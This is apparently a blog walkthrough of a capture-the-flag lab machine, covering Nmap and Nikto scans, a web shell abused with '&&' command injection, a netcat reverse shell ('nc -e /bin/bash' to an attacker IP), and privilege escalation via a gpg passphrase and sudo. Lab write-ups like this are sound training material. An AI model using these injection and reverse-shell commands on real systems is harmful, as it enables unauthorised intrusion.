I banged my head a bit on this one.  The low privilege shell was quick but the privilege escalation had me twisting for a while.  This box is definitely a mixture of standard exploitation with a CTF twist.  CTF is not really my thing but I enjoyed this box.  It was clever and there were some components to it that are truer to life than some of the boxes that don't seem to have a purpose other than being a target.  

Starting off with an Nmap scan:






Three ports open, I check the FTP.  I can login anonymously, I can't write, it gives me some PASV issues, I switch to PFTP which doesn't work at all, and I decide to move on.  No images of me floundering.  

Checking out the web port with Nikto:

I figured this would turn up something and out of the box, I have four things to check out.  

Hitting the file with the promising name:

I already know that I want to bang on the input but I'm going to check out the other three first.

Checking out the memo:

Adding the username Bob to my list.  Bob makes reference to the web shell, another juicy page to check out.

Let's see what we find with this one:

Yeah, hackers can't do anything with a hash.  hashcat64.exe -mX yourlamehash.txt rockyou.txt

And finally, the login page:

As I suspected, I'm heading back to dev_shell.php --

Let's see what happens when we ask for id:

Cool.  Can we read /etc/passwd?  : 

Ha!  I am a skid.  

It's doing some filtering but can we get command execution:

There are a few ways you can try to inject, I tried a single semicolon and I also tried the double pipe || which is "Or If" but "And If", the double ampersand && ended up working.

Viewing source should clean this up:

Five users, excellent.  

The syntax is too long but I go back to the input box and I enter the following:

id && nc -e /bin/bash 192.168.0.51 53

Setting up my listener:

Cool!  Low privilege shell.  

Let's see what we have in /home:

One missing from our passwd file, c0rruptedb1t.

Let's check out bob's home dir:

Let's see what we have here:

l00t!  

Continuing with the enumeration of bob's home dir:

Looking at the note:

Bob is not a nice person. 

He's also nested a bunch of folders so rather than digging into each, I'm going to look through them recursively:

Something juicy?

Let's take a look:

I got no idea what to do with this and I hone in on Cucumber and try to login with it.  That doesn't work.  Nor does trying to open that gpg file.  

Continuing to look around:

Elliot is also not a nice person.

Let's see what we have here:

More l00t.

At this point, I feel like this guy:





I start hunting for images:

I find two images on the web site and one in elliot's home dir and I check them for exif data.  No joy.

I start digging through the system, I throw some kernel exploits, I get nothing. 

I start thinking about this piece:





I start thinking about rudimentary crypto and then it dawns on me:

What if....






Thinking about the other piece of the puzzle, I wonder if this is my passphrase for gpg:

Bouncing around as I did, when I first attempted to use it, it gave me an error because I was back at www-data which doesn't have a home dir to write.  Thought I'd just point that out.  Su to jc, or any user with a writable home dir, and I get into the file and retrieve l00t.

Let's su to bob:

I su to bob, check sudoers, learn that bob has all : all and I'm golden.  

One last thing to do:

Excellent box!  Very clever.  Wish I played more word puzzles, I might have solved this a lot sooner.  

At first glance, you'd think -- who would leave a password file on their computer.  Users, that's who.  Most of the users I deal with are on Windows machines and they are using Microsoft Office.  I hunt for files titled:  password*.docx and password*.xlsx -- you'll be surprised what you find.  There's at least one user on every network.  I get the "What am I supposed to do with all of these passwords..." at which point we talk about "password managers".